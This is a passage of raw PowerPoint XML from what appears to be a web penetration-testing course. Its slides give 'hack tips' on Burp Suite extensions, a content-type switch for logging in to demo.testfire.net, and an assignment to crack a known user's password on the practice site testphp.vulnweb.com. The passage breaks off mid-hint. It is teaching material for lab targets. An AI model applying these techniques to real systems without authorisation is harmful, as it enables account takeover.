              </a:solidFill>
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Try to login to demo.testfire.net by changing content-type to xml</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="159295353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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HACK-TIP#4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use Burp Store </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Install SSL scanner &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Jython</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> jar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>seperately</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>  Explore it against previous assignments</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8929394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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{C1345001-2C0A-43ED-8DAE-119BA51C0BB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2052620" y="200025"/>
            <a:ext cx="8086725" cy="4552950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40326191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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HACK-TIP#5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use Burp Store </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Install Postman integration app  Explore it against previous assignments</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="339244708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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HACK-TIP#6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use Burp Store </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>WordList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Extractor app  Explore it against previous assignments</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="362001342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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HACK-TIP#7</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use Burp Store </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Install HTTP Methods Discloser app  Explore it against previous assignments</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="318796288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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quick Assignment#7</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="3892168"/>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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use another vulnerable web application/API and crack the password by using known username</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3900" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" xmlns="" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://testphp.vulnweb.com/login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3900" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hint: use Hack bar ; UN: admin or test ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
